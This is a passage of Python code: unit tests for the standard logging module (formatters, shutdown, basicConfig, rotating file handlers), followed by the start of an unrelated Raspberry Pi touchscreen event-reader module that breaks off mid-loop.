dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
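# FakeHandler records every acquire/flush/close/release call it receives so that
# ShutdownTest below can assert that logging.shutdown() tears handlers down in reverse
# order of registration and still reaches 'release' when an earlier step raises.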
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
def test_logging_at_shutdown(self):
# Issue #20037
code = """if 1:
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()"""
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
if threading:
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.level = self.original_logging_level
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='foo')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, 'foo')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
old_raise = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', old_raise)
logging.raiseExceptions = True
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
old_raise = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', old_raise)
logging.raiseExceptions = False
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
# If maxbytes is zero rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
@support.requires_zlib
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
#print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
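# The loop above generates one test_compute_rollover_<when> method per interval code;
# binding 'when' and 'exp' as default arguments freezes their values at definition time
# before setattr attaches each generated test to TimedRotatingFileHandlerTest.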
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
h = logging.handlers.NTEventLogHandler('test_logging')
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@support.run_with_locale('LC_ALL', '')
def test_main():
support.run_unittest(
BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest,
HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest,
DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest,
ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest,
StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest,
LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest,
RotatingFileHandlerTest, LastResortTest, LogRecordTest,
ExceptionTest, SysLogHandlerTest, HTTPHandlerTest,
NTEventLogHandlerTest, TimedRotatingFileHandlerTest,
UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest)
if __name__ == "__main__":
test_main()
|
tftevdev.py
|
#!/usr/bin/python
##################################################################################
# IMPORTS
##################################################################################
import evdev
import pygame
from Queue import Queue
from threading import Thread, Event
from pygame.locals import *
from tftutility import logger, Screen
# Class for handling events from piTFT
class TftTouchscreen(Thread):
def __init__(self, device_path="/dev/input/touchscreen"):
super(TftTouchscreen, self).__init__()
self.device_path = device_path
self.events = Queue()
self.shutdown = Event()
self.rotation = 0
def run(self):
thread_process = Thread(target=self.process_device)
thread_process.daemon = True
thread_process.start()
self.shutdown.wait()
def get_event(self):
if not self.events.empty():
event = self.events.get()
yield event
else:
yield None
def queue_empty(self):
return self.events.empty()
def process_device(self):
device = None
try:
device = evdev.InputDevice(self.device_path)
except Exception as ex:
message = "Unable to load device {0} due to a {1} exception with message: {2}.".format(
self.device_path, type(ex).__name__, str(ex))
logger.error(message)
raise OSError(message)
finally:
if device is None:
self.shutdown.set()
logger.debug("Loaded device {} successfully.".format(self.device_path))
event = {'time': None, 'id': None, 'x': None, 'y': None, 'touch': None}
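# evdev delivers one touch sample as a burst of partial events: ABS_X/ABS_Y update the
# coordinates, an ABS_MT_TRACKING_ID of -1 marks lift-off, EV_KEY carries the touch
# state, and the terminating SYN report is where the assembled sample is timestamped and
# pushed onto the queue before the dict is reset for the next burst.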
while True:
for input_event in device.read_loop():
if input_event.type == evdev.ecodes.EV_ABS:
